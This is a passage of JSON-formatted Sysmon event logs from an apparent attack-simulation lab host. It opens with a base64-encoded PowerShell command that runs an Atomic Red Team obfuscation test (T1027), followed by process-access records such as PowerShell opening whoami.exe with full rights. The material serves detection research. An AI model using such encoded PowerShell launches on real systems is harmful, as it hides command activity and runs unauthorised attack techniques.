WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBHAGUAdABQAHIAZQByAGUAcQBzAA==","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4925,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.249\r\nSourceProcessGUID: {A837DB8D-0324-5F25-0000-00100DC10700}\r\nSourceProcessId: 4984\r\nSourceThreadId: 4316\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-0325-5F25-0000-0010E3DB0700}\r\nTargetProcessId: 1656\r\nTargetImage: C:\\Windows\\system32\\whoami.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+982a2ee2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97743fbc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97743c8d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981f50a2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97704823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97762cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977461e8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9773816d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977446a0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9774423c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97743fbc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97743c8d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981f50a2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97704823(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.249","SourceProcessGUID":"{A837DB8D-0324-5F25-0000-00100DC10700}","SourceProcessId":"4984","SourceThreadId":"4316","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-0325-5F25-0000-0010E3DB0700}","TargetProcessId":"1656","TargetImage":"C:\\Windows\\system32\\whoami.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+982a2ee2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97743fbc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97743c8d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981f50a2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97704823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97762cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977461e8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9773816d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977446a0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9774423c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97743fbc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97743c8d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981f50a2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97704823(wow64)","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4926,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.249\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0325-5F25-0000-0010E3DB0700}\r\nTargetProcessId: 1656\r\nTargetImage: C:\\Windows\\system32\\whoami.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.249","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0325-5F25-0000-0010E3DB0700}","TargetProcessId":"1656","TargetImage":"C:\\Windows\\system32\\whoami.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4927,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.249\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.249","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4928,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.249\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.249","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4929,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.249\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.249","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4930,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.249\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.249","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4931,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.249\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 